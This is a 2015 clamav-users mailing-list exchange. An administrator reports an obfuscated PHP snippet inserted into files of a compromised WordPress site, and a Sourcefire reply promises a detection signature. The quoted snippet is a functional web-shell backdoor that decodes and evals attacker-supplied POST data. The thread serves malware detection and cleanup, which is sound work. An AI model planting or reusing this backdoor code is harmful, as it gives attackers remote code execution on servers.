[clamav-users] basic malware missed???

Alain Zidouemba azidouemba at sourcefire.com
Wed Mar 25 13:39:54 EDT 2015


Coverage under the name "Php.Trojan.PCT4" will be released shortly.

Thanks,

- Alain

On Tue, Mar 24, 2015 at 5:40 PM, Steve Holdoway <steve at greengecko.co.nz>
wrote:

> Hi folks,
>
> I'm in the process of cleaning up an infected wordpress website and am
> finding a number of files that contain
>
> <?php
> $sF="PCT4BA6ODSE_";
> $s21=strtolower($sF[4].$sF[5].$sF[9].$sF[10].$sF[6].$sF[3].$sF[11].$sF[8].$sF[10].$sF[1].$sF[7].$sF[8].$sF[10]);$s20=strtoupper($sF[11].$sF[0].$sF[7].$sF[9].$sF[2]);if
> (isset(${$s20}['na04af1'])) {eval($s21(${$s20}['na04af1']));}?>
>
> Inserted at the top of the file.
>
> Surely this is something pretty simple to catch?
>
> I'm scanning the docroot nightly, and freshclam is up to date... output
> from just run freshclam:
>
> # freshclam
> ClamAV update process started at Wed Mar 25 08:38:55 2015
> main.cvd is up to date (version: 55, sigs: 2424225, f-level: 60,
> builder: neo)
> Downloading daily-20233.cdiff [100%]
> Downloading daily-20234.cdiff [100%]
> daily.cld updated (version: 20234, sigs: 1357485, f-level: 63, builder:
> jesler)
> bytecode.cld is up to date (version: 247, sigs: 41, f-level: 63,
> builder: dgoddard)
> Database updated (3781751 signatures) from db.au.clamav.net (IP:
> 117.104.160.194)
>
> I'm finding them by searching for the string "PCT4BA6ODSE"
>
> Shouldn't this be in there already? If there is a process to add this
> can someone please point me to the docs?
>
> Thanks,
>
>
>
> Steve
>
>
> --
> Steve Holdoway BSc(Hons) MIITP
> http://www.greengecko.co.nz
> Linkedin: http://www.linkedin.com/in/steveholdoway
> Skype: sholdowa
>
>


